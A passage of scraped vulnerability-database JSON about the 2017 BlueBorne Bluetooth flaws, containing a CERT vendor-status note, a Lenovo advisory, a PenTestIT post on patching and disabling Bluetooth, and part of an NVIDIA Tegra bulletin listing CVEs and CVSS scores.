Click here to view vendors.**\n\n### Android Open Source Project Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry __ Affected\n\nNotified: September 18, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFrom the BlackBerry [security notice](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>):\n\n\"BlackBerry recommends that all users of BlackBerry powered by Android smartphones should update to the September Security Maintenance release as soon as it is available. \n\nThere is no action necessary for users of BlackBerry 10 or BlackBerry OS smartphones. \n\nBlackBerry recommends keeping server and device operating systems up to date. 
\n\nQNX customers should contact their Bluetooth stack vendor for guidance.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>)\n\n### Google Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo __ Affected\n\nNotified: September 12, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSome Lenovo products are affected; patches are available. 
Users are encouraged to check [Lenovo Security Advisory LEN-17125](<https://support.lenovo.com/us/en/product_security/LEN-17125>) for details.\n\n### Vendor References\n\n * <https://support.lenovo.com/us/en/product_security/LEN-17125>\n\n### Microsoft Corporation __ Affected\n\nNotified: September 12, 2017 Updated: September 13, 2017 \n\n**Statement Date: September 12, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Microsoft released security updates on July 11, 2017, and customers who have Windows Update enabled and applied the security updates, are protected automatically.`\n\n### Vendor Information \n\n[`CVE-2017-8628`](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)` describes this vulnerability in affected Microsoft products.`\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n\n### Samsung Mobile Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Tizen Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Technicolor __ Not Affected\n\nUpdated: November 08, 2017 \n\n**Statement Date: October 18, 2017**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nTechnicolor products are unaffected since most of them do not provide Bluetooth capacity.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Amazon Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe 
have not received a statement from the vendor.\n\n### Vendor References\n\n### Barnes and Noble Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### HTC Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Kyocera Communications Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### LG Electronics Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Motorola, Inc. 
Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xiaomi Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 18 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.9 | AV:A/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 6.2 | E:POC/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.armis.com/blueborne/#/technical>\n * <https://source.android.com/security/bulletin/2017-09-01>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n * <http://cwe.mitre.org/data/definitions/120.html>\n * <http://cwe.mitre.org/data/definitions/122.html>\n * <http://cwe.mitre.org/data/definitions/125.html>\n * <http://cwe.mitre.org/data/definitions/191.html>\n * <http://cwe.mitre.org/data/definitions/300.html>\n\n### Acknowledgements\n\nThese vulnerabilities were publicly disclosed by Ben Seri and Gregory Vishnepolsky of Armis. 
Armis acknowledges Alon Livne for the Linux RCE (CVE-2017-1000251) exploit.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-0781](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0781>), [CVE-2017-0782](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0782>), [CVE-2017-0783](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0783>), [CVE-2017-0785](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0785>), [CVE-2017-8628](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8628>), [CVE-2017-14315](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-14315>), [CVE-2017-1000250](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-1000250>), [CVE-2017-1000251](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-1000251>) \n---|--- \n**Date Public:** | 2017-09-12 \n**Date First Published:** | 2017-09-12 \n**Date Last Updated: ** | 2017-11-08 20:46 UTC \n**Document Revision: ** | 56 \n", "modified": "2017-11-08T20:46:00", "published": "2017-09-12T00:00:00", "id": "VU:240311", "href": "https://www.kb.cert.org/vuls/id/240311", "type": "cert", "title": "Multiple Bluetooth implementation vulnerabilities affect many devices", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2019-01-23T11:50:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-14315", "CVE-2017-0782"], "description": "**Lenovo Security Advisory**: LEN-17125\n\n**Potential Impact**: Remote code execution\n\n**Severity**: High\n\n**Scope of Impact**: Industry wide\n\n**CVE Identifier**: CVE-2017-0781, CVE-2017-0782, CVE-2017-0783, CVE-2017-0785, CVE-2017-8628, CVE-2017-14315, CVE-2017-1000250, CVE-2017-1000251\n\n**Summary Description**:\n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" have been identified that affect Windows, iOS, and Linux-kernel-based operating systems. 
In worst case scenarios, these vulnerabilities allow an unauthenticated attacker to perform commands on affected devices.\n\n**Mitigation Strategy for Consumers (what you should do to protect yourself):**\n\nPatches are available in the latest patch releases from Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, Linux providers, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)).\n\nU.S.-based phone and other mobile device users running Android are advised to regularly check this advisory page. Due to the complexity of the U.S. mobile ecosystem, which typically requires manufacturer and carrier support to push updates, updates are in progress. Users are encouraged to accept updates to their Android device upon receiving notifications to update their operating system.\n\n \nIf an update is not available, affected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary.\n\n**Product Impact**:\n", "edition": 644, "modified": "2018-07-19T12:31:05", "published": "2018-07-19T12:31:00", "id": "LENOVO:PS500141-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-17125", "title": "Bluetooth \u201cBlueBorne\u201d Vulnerabilities - NL", "type": "lenovo", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestit": [{"lastseen": "2017-09-19T10:19:42", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "description": "PenTestIT RSS Feed\n\nNo matter what part of the world you live in, I'm sure that you must have at least heard about the latest Bluetooth attack making rounds - **BlueBorne**. 
I'm also sure that some of you have a vulnerable device and some time to wait until your vendor releases a patch remediating this vulnerability. If this is the case, then this post is for you, as it discusses the different steps you can take to try and avoid being exploited with the BlueBorne Bluetooth vulnerability.\n\n\n\n## What is BlueBorne?\n\nBlueBorne is a new set of unauthenticated vulnerabilities targeting multiple operating systems such as Android, iOS, Windows, and Linux, and the devices that have these operating systems installed. The name is derived from the word \u2018airborne\u2019 as it allows unauthenticated attackers to take over devices on air-gapped networks. Additionally, this set of attacks does not require the targeted device to be set to discoverable mode or to be paired with the attacker\u2019s device. More information about this set of vulnerabilities can be found [here](<https://www.armis.com/blueborne/>).\n\n## Vulnerabilities that make up BlueBorne:\n\n * **CVE-2017-0781**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nDue to a faulty implementation of the Bluetooth Network Encapsulation Protocol (BNEP) service, a heap overflow occurs when an incorrect buffer size is passed to a memcpy call. This condition allows an attacker to execute arbitrary code, and the vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0782**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nAn integer underflow condition exists while packets are processed by `bnep_process_control_packet()`. This memory corruption can be triggered in the Personal Area Networking (PAN) profile of the BNEP service and allows an attacker to execute arbitrary code. 
The vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0783**: A vulnerability in the PAN profile of the Bluetooth stack enables the attacker to create a network interface on the victim\u2019s device and transmit all communication over this network interface, aka [man-in-the-middle](<http://pentestit.com/tag/man-in-the-middle/>). This affects all Android devices prior to September 9, 2017 Security Patch level.\n * **CVE-2017-0785**: The SDP (Service Discovery Protocol) server enables a device to identify other Bluetooth services in its range. An attacker can send crafted request packets to the target, which causes it to disclose memory bits in response packets.\n * **CVE-2017-8628:** Similar to CVE-2017-0783, this affects all versions of [Microsoft Windows](<http://pentestit.com/tag/microsoft-windows/>) from Windows Vista to Windows 10.\n * **CVE-2017-1000250**: Information leak vulnerability in the BlueZ implementation for Linux. The SDP server discloses memory bits in response packets when it receives a specially crafted packet from an attacker.\n * **CVE-2017-1000251**: A memory corruption exists because of a stack overflow vulnerability in the L2CAP (Logical Link Control and Adaptation Protocol), again in BlueZ for Linux.\n * **CVE-2017-14315**: Remote code execution via Apple\u2019s Low Energy Audio Protocol (LEAP) affecting Apple iOS versions 9.3.5 and lower, and AppleTV tvOS versions 7.2.2 and lower \nAn overly large audio command sent to a targeted device causes a heap overflow due to improper validation of the received command.\n\nWith this theory about _BlueBorne_ out of the way, let's get to the crux of this post.\n\n## How to protect systems from BlueBorne attacks?\n\n 1. 
Microsoft Windows: Apply patches listed in the September 2017 advisory - [CVE-2017-8628 | Microsoft Bluetooth Driver Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)\n * If you are not able to do so, you can deactivate the Bluetooth module itself. The best way to protect your Windows systems from BlueBorne attacks is by disabling the Bluetooth device from the Device Manager.\n 2. Android: If you are lucky enough you will have a supported phone which can get OTAs from your provider and upgrade to the latest [September 9, 2017 Security Patch Level](<https://source.android.com/security/bulletin/2017-09-01>). If not, you always have an option of [sideloading an OTA](<https://developers.google.com/android/ota>). Unfortunately, this patch will be available only for Nougat (7.0), Marshmallow (6.0). You also have an option of getting on a custom ROM such as [LineageOS](<https://review.lineageos.org/#/c/189415/>).\n 3. Apple: Upgrade to iOS version 10 and Apple TV versions above 7.2.2.R\n 4. *NIX: This is a bit tricky as some vendors have already released a patch and some have not. For example, [RHEL](<https://access.redhat.com/security/vulnerabilities/blueborne>) and [Debian CVE-2017-1000250](<https://security-tracker.debian.org/tracker/CVE-2017-1000250>) and [CVE-2017-1000251](<https://security-tracker.debian.org/tracker/CVE-2017-1000251>) are already available. 
However, if you still want to disable Bluetooth, this is how: \nUbuntu/Debian:\n \n sudo mv /etc/init/bluetooth.conf /etc/init/bluetooth.conf.disabled\n\nRun:\n \n #Disable and stop the Bluetooth service\n systemctl disable bluetooth.service\n systemctl mask bluetooth.service\n systemctl stop bluetooth.service\n #Remove Bluetooth modules\n rmmod bnep\n rmmod bluetooth\n rmmod btusb\n\nYou can even follow the RHEL SCAP Security Guide [here](<https://github.com/OpenSCAP/scap-security-guide/blob/master/RHEL/7/templates/static/bash/service_bluetooth_disabled.sh>).\n 5. Armis Labs have also released an Android [App](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector&hl=en>) \u201cBlueBorne Vulnerability Scanner\u201d to detect devices that are vulnerable to BlueBorne.\n\nThe post [How to: Protect Systems From BlueBorne Attacks?](<http://pentestit.com/protect-systems-blueborne-attacks/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-09-14T21:22:24", "published": "2017-09-14T21:22:24", "href": "http://pentestit.com/protect-systems-blueborne-attacks/", "id": "PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF", "title": "How to: Protect Systems From BlueBorne Attacks?", "type": "pentestit", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nvidia": [{"lastseen": "2021-02-04T16:27:18", "bulletinFamily": "software", "cvelist": ["CVE-2016-0834", "CVE-2016-2434", "CVE-2016-2491", "CVE-2016-3793", "CVE-2016-3814", "CVE-2016-3815", "CVE-2016-3847", "CVE-2016-3873", "CVE-2016-3930", "CVE-2016-6775", "CVE-2016-6776", "CVE-2016-6777", "CVE-2016-6789", "CVE-2016-6915", "CVE-2016-6916", "CVE-2016-6917", "CVE-2016-8395", "CVE-2016-8397", "CVE-2016-8400", "CVE-2016-8424", "CVE-2016-8425", "CVE-2016-8426", "CVE-2016-8427", "CVE-2016-8428", "CVE-2016-8429", "CVE-2016-8430", "CVE-2016-8449", "CVE-2016-8482", "CVE-2017-0306", "CVE-2017-0307", "CVE-2017-0325", "CVE-2017-0326", 
"CVE-2017-0327", "CVE-2017-0331", "CVE-2017-0332", "CVE-2017-0428", "CVE-2017-0429", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14491", "CVE-2017-14492", "CVE-2017-14493", "CVE-2017-14494", "CVE-2017-14495", "CVE-2017-14496", "CVE-2017-6273"], "description": "### Vulnerability Details\n\nThe following sections summarize the vulnerabilities. Descriptions use [CWE\u2122](<https://cwe.mitre.org/>) and risk assessments follow [CVSS](<https://www.first.org/cvss/user-guide>).\n\n#### CVE-2016-2434\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an attacker can write an arbitrary value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8482\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0429\n\nNVIDIA kernel driver contains a vulnerability in the `i2c-hid` driver where an attacker has the ability to write an arbitrary value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6789\n\nNVIDIA OpenMax Component contains a vulnerability in `LIBNVOMX.SO` where an attacker has the ability to write an arbitrary 
value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0306\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to denial of service.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 7.8 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:R](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:R>)\n\n#### CVE-2017-0307\n\nNVIDIA Tegra kernel contains a vulnerability in DRM driver where the driver performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, which may lead to a buffer overflow possibly causing a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3847\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in `NVAVP` where the buffer size allocated is incorrectly calculated for the size to be used, which could lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0325\n\nNVIDIA kernel driver contains a vulnerability in the `i2c-hid` driver where an 
attacker has the ability to write an arbitrary value to an arbitrary location, which may lead to possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3814\n\nNVIDIA Kernel driver contains a vulnerability in NVIDIA camera where the buffer being overwritten is allocated to the heap portion of the memory, which may lead to denial of service.\n\nCVSS Base Score: 8.6 \nCVSS Temporal Score: 7.7 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H>)\n\n#### CVE-2017-0326\n\nNVIDIA Tegra kernel driver contains a vulnerability in the Tegra Display Controller driver where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to denial of service.\n\nCVSS Base Score: 8.5 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6777\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6915, CVE-2016-6916, and CVE-2016-6917\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an integer overflow to buffer overflow may cause a 
denial of service.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6776, CVE-2017-0428, CVE-2016-8426 and CVE-2016-8427\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6775\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-0834\n\nNVIDIA OpenMax Component contains a vulnerability in the Video Decoder driver library `libnvmmlite_video.so` where a value passed from a user to the driver is not correctly validated and is used as the index to an array, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.3 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C>)\n\n#### CVE-2017-0327\n\nNVIDIA Tegra kernel driver contains a vulnerability in the NVIDIA crypto driver where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to 
denial of service.\n\nCVSS Base Score: 8.2 \nCVSS Temporal Score: 7.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvbugswb.nvidia.com/NvBugs5/SWBug.aspx?bugid=1858005&cmtNo=>)\n\n#### CVE-2016-3815\n\nNVIDIA Kernel driver contains a vulnerability in NVIDIA camera where the buffer being overwritten is allocated to the stack, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.2 \nCVSS Temporal Score: 7.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8425\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8424 and CVE-2016-8429\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0331\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where untrusted data can change between validation and use which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: 
CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8430\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in `NVHOST` where the application dereferences a pointer that it expects to be valid but is `NULL`, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8428\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where there is the potential to read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-2491\n\nNVIDIA Tegra kernel driver contains a vulnerability in the NVIDIA camera kernel mode driver where a calculation to determine memory allocation improperly executes and allots less memory than needed, causing a buffer overflow, which may lead to denial of service.\n\nCVSS Base Score: 7.7 \nCVSS Temporal Score: 6.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3793\n\nNVIDIA Tegra Kernel driver contains a vulnerability in the NVIDIA camera kernel driver where referencing memory after it has been freed may lead to denial of service.\n\nCVSS Base Score: 7.4 \nCVSS Temporal 
